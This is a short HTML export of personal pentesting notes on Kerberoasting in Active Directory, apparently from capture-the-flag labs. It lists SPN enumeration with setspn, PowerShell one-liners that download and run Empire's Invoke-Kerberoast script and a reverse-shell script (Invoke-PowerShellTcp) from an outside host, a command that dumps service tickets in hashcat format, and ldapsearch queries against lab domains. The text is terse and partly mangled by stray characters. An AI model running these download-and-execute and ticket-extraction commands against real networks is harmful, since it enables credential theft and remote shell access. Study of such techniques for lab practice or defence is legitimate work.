<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>AD services</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>AD services</h1>

      <div class="ck-content"><pre><code class="language-text-plain">setspn -T medin -Q ​ */* </code></pre>

        <p>we can extract all accounts in the SPN.</p>
        <p>SPN is the Service Principal Name, and is the mapping between service
          and account.</p>
        <p>Lets first get the Powershell Invoke-Kerberoast script.</p><pre><code class="language-text-plain">iex​(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1') 

powershell IEX(New-Object Net.webclient).downloadString(\"http://10.8.165.116/Invoke-PowerShellTcp.ps1\")</code></pre>

        <p>Now lets load this into memory: </p><pre><code class="language-text-plain">Invoke-Kerberoast -OutputFormat hashcat ​ |fl</code></pre>

        <p>You should get a SPN ticket.</p><pre><code class="language-text-plain">ldapsearch -x -b "dc=windcorp,dc=thm" -H ldap://10.10.2.199
ldapsearch -H ldap://10.10.172.129 -x -b 'DC=COOCTUS,DC=CORP' -D 'COOCTUS\Visitor' -W</code></pre>
      </div>
    </div>
  </body>

</html>